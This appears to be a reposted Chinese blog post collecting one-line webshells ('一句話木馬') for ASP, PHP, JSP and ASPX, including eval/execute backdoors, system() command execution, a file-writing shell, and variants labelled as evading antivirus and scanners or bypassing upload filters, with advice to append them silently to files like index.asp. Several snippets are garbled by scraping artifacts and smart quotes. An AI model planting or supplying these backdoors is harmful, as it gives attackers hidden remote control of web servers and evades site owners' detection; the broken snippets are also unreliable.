2. 程式人生 > >各種一句話木馬大全

各種一句話木馬大全

阿新 發佈:2018-11-29

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84206143

<%eval request("c")%>
<%execute request("c")%>
<%execute(request("c"))%>
<%ExecuteGlobal request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<%eval(Request.Item["c"],"unsafe");%>
'備份專用
<%eval(request("c")):response.end%>
'無防下載表,有防下載表突破專用一句話
<%execute request("c")%><%<%loop<%:%>
<%<%loop<%:%><%execute request("c")%>
<%execute request("c")<%loop<%:%>
'防殺防掃專用
<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
'不用"<,>"
<script language=VBScript runat=server>execute request("c")</script>
<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性別':eval,'年齡':'18','暱稱':'請叫我一聲老大'};lcx.性別((lcx.
名字)+'') %>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=vbs runat=server>eval_r(request("c"))</script>
'不用雙引號
<%eval request(chr(35))%>
'可以躲過雷客圖
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
<%dy=request("dy")%><%Eval(dy)%>
'容錯程式碼
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
PHP一句話

<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php (
 
[email protected]$_GET1)[email protected]$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容錯程式碼
<?php assert($_POST1);?>//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入*/:<O>
 
[email protected]_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//繞過<?限制的一句話
<script language="php">@eval_r($_POST[sb])</script>

//繞過<?php ?>限制的一句話 

<?=eval($_POST['cmd']);

JSP一句話

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
提交客戶端
<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>
ASPX一句話
<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

普通的php一句話:<?php @eval($_POST['r00ts']);?>
普通的asp一句話:<%eval(Request.Item["r00ts"],”unsafe”);%>
aspx突破一流的:
dim da
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
Response.Write "yes"
else
Response.Write "no"
end if
err.clear
end if
set da=nothing
set fos=nothing
Response.Write "<form action=" method=post>"
Response.Write "<input type=text name=path>"
Response.Write "<br>"
Response.Write "當前檔案路徑:"&server.mappath(request.servervariables("script_name"))
Response.Write "<br>"
Response.Write "作業系統為:"&Request.ServerVariables("OS")
Response.Write "<br>"
Response.Write "WEB伺服器版本為:"&Request.ServerVariables("SERVER_SOFTWARE")
Response.Write "<br>"
Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
Response.Write "<br>"
Response.Write "<input type=submit value=save>"
Response.Write "</form>"
</Script>


ASP一句話:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防殺放掃 一句話:<?php (])?>
上面這句是防殺防掃的!網上很少人用!可以插在網頁任何ASP檔案的最底部不會出錯,比如
index.asp裡面也是可以的!

因為加了判斷!加了判斷的PHP一句話,與上面的ASP一句話相同道理,也是可以插在任何PHP檔案
的最底部不會出錯!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

無防下載表,有防下載表可嘗試插入以下語句突破的一句話
<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>


備份專用<%eval(request(“1″)):response.end%>
asp一句話<%execute(request(“1″))%>
aspx一句話:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y(“add6bb58e139be10″);</script>

可以躲過雷客圖的一句話。
<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用'<,>‘的asp一句話<scriptrunat=server>execute request(“1″)</script>

不用雙引號的一句話。<%eval request(chr(35))%>

 

相關推薦

各種一句話木馬大全

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84206143 <%eval request("c")%> <%execute request("c")%> <%execute(request

表弟讓整理的各種一句話後門= =

信息安全 php asp php 利用404頁面隱藏PHP小馬<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</titl

一句話木馬(webshell)是如何執行命令的

webshell 一句話木馬 在很多的滲透過程中,滲透人員會上傳一句話木馬(簡稱webshell)到目前web服務目錄繼而提權獲取系統權限,不論asp、php、jsp、aspx都是如此,那麽一句話木馬到底是如何執行的呢,下面我們就對webshell進行一個簡單的分析。首先我們先看一個原始而

變形的一句話木馬

usleep col shell sleep pre system php @ style 使用 簡潔的變形馬 <?php @$_=$_GET[1].@$_($_GET[2])?> 利用方式 http://xxx.com/a.php?1=assert&

mysql寫入一句話木馬

前提: root許可權,知道了伺服器的web的絕對路徑,嘗試寫入一句話 mysql查詢語句執行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php" 注意事項: 1、絕對路徑的猜解

PHP一句話木馬Webshell變形免殺總結

0×00 前言   大部分Webshell查殺工具都是基於關鍵字特徵的,通常他們會維護一個關鍵字列表,以此遍歷指定副檔名的檔案來進行掃描,所以可能最先想到的是各種字串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚.   0×01 字串上的舞蹈     一

一句話木馬提權

很多時候,當我們上傳了一句話木馬之後,想要進行一些操作。比如,檢視當前使用者的身份,這時會發現許可權不夠,當前的命令列只對網站當前目錄下的檔案具有操作許可權,對其他目錄和系統都沒有許可權,這時我們就需要提權了。 我們把下面兩個程式上傳到網站目錄下去 程式連結:連結: https://p

【Java】各種型別轉換大全

目錄 Object轉Integer public static void main(String[] args) { Object obj = 111;

PHP 一句話木馬

特殊 技術 函數返回 code 分享 span ima rap .com eval 函數 eval() 函數把字符串按照 PHP 代碼來計算 該字符串必須是合法的 PHP 代碼,且必須以分號結尾 如果沒有在代碼字符串中調用 return 語句,則返回 NU

oracle的各種常用函式大全

1.字元函式   (1)concat(str1,str2)字串拼接函式 select concat('Hello ','World') from dual; --等價於 select 'Hello '||'World' from dual;   (2)initcap(s

php 一句話木馬、後門

強悍的PHP一句話後門 這類後門讓網站、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的PHP一句話木馬。 利用404頁面隱藏PHP小馬: <strong><!DOC

python 各種包下載大全網址

經常碰見pip install出現異常,安裝不了一些python包。 收藏分享一個python庫下載網站,可以先在上面直接下載到本地,然後進入對應的資料夾,pip install 一波,就能完美安

中國菜刀與一句話木馬

中國菜刀下載地址:   http://pan.baidu.com/share/link?shareid=871753024&uk=388464620一.基本操作:往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄

明小子注入工具+啊D注入工具+御劍後臺掃描工具+中國菜刀一句話木馬

明小子: 明小子主要功能為“SQL注入猜解”,手工猜測太過繁瑣,使用明小子可以檢測是否存在注入點,猜解表名,列名和欄位資料(使用者名稱和密碼) 使用: 1.單擊工具中的“SQL注入猜解”,輸入網站地址

webshell一句話木馬

 asp一句話木馬 <%eval request("sb")%> <%execute request("sb")%> <%execute(request("sb"))%&

[基本實驗] 中國菜刀與一句話木馬

PHP的一句話木馬內容如下:<?php @eval($_POST['chopper']);?> 將這個木馬放到“網站”中,開啟中國菜刀,在空白處點選滑鼠右鍵,選擇“新增”選項。 編輯相關引

Java虛擬機器-JVM各種引數配置大全詳細

 usr/local/jdk/bin/java -Dresin.home=/usr/local/resin -server -Xms1800M -Xmx1800M -Xmn300M -Xss512K -XX:PermSize=300M -XX:MaxPermSize=3

PHP一句話木馬研究

quest params slide tin gin 相同 handler 函數參數 方法 最近在研究PHP一句話後門,查閱了很多大佬的博客,並從中衍生出了一些可用的方法。 現總結如下: 方案一:回調函數 回調函數:Callback (即call then back 被主

Swing 各種元件組合大全

import java.awt.*; import java.awt.event.*; import javax.swing.*; import javax.swing.event.*; //import java.awt.List; /** * Descriptio

PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行 bool assert ( mixed $assertion [, string $description ] ) PHP 5bool assert ( mixed $asse